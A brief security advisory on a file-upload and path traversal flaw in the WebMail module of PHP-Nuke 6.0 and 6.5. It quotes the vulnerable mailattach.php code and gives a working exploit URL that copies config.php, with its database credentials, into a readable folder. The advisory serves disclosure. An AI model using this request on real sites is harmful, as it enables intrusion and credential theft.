|
Brought to you by:
Suppliers of:
|
|
|
| |
| PHP-Nuke is an open-source program for creating and managing news-based Web sites created by Francisco Burzi. PHP-Nuke could allow a remote attacker to include malicious PHP files, caused by a vulnerability in the WebMail module and all other modules with the ability to upload files. |
| |
Credit:
The information has been provided by Frog Man.
|
| |
Vulnerable systems:
* PHP-Nuke version 6.0
* PHP-Nuke version6.5
A remote attacker can send a specially crafted URL request to the mailattach.php script that specifies a malicious PHP file from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server, and possibly obtain a user's database password.
Vulnerable code:
From mailattach.php file:
if (isset($userfile) AND $userfile != "none") {
if (ini_get(file_uploads) AND $attachments == 1) {
$updir = "tmp";
@copy($userfile, "$updir/$userfile_name");
Exploit:
http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
|
|
|
|
|
